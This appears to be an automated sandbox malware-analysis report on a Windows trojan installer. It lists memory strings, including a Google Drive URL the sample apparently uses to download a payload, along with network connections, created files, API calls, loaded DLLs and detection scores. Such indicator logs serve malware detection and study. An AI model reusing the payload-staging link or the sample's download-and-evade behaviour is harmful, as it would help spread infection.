      Source: Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4gCL3LQ3cnIDyIL4
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4n$
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4s
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4st
      Source: Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4stV$
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4z$
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/xq3
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/Z
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download0
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download8Z
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadGh
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadH
      Source: Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadWo
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadY
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloade
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadeh
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadfo
      Source: Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadom
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadoo
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadt
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadxq
      Source: Osb7hkGfAb.exe, 00000006.00000001.2123046241.0000000000649000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2950032737.0000000002E54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: Osb7hkGfAb.exe, 00000006.00000003.2950032737.0000000002E54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
      Source: Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.co
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
      Source: unknown | HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49708 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.10:49710 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49780 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49981 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.10:49984 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49985 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.10:49988 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49991 version: TLS 1.2
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | File created: C:\Windows\resources\0809
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | File created: C:\Windows\Arder.lnk
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Code function: 0_2_00406945
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Code function: 0_2_0040711C
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Code function: 0_2_700E1A98
      Source: Osb7hkGfAb.exe | Static PE information: invalid certificate
      Source: Osb7hkGfAb.exe, 00000000.00000000.1462667120.0000000000458000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs Osb7hkGfAb.exe
      Source: Osb7hkGfAb.exe, 00000006.00000000.2121177935.0000000000458000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs Osb7hkGfAb.exe
      Source: Osb7hkGfAb.exe | Binary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs Osb7hkGfAb.exe
      Source: Osb7hkGfAb.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engine | Classification label: mal76.troj.evad.winEXE@3/8@2/2
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | File created: C:\Users\user\tranchet
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | File created: C:\Users\user\AppData\Local\Temp\nsi675E.tmp
      Source: Osb7hkGfAb.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: Osb7hkGfAb.exe | ReversingLabs: Detection: 75%
      Source: Osb7hkGfAb.exe | Virustotal: Detection: 68%
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | File read: C:\Users\user\Desktop\Osb7hkGfAb.exe
      Source: unknown | Process created: C:\Users\user\Desktop\Osb7hkGfAb.exe "C:\Users\user\Desktop\Osb7hkGfAb.exe"
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Process created: C:\Users\user\Desktop\Osb7hkGfAb.exe "C:\Users\user\Desktop\Osb7hkGfAb.exe"
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Process created: C:\Users\user\Desktop\Osb7hkGfAb.exe "C:\Users\user\Desktop\Osb7hkGfAb.exe"
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: dwmapi.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: oleacc.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: version.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: shfolder.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: powrprof.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: wkscli.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: netutils.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: umpdc.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: wininet.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: urlmon.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: rasadhlp.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: fwpuclnt.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe | Section loaded: schannel.dll
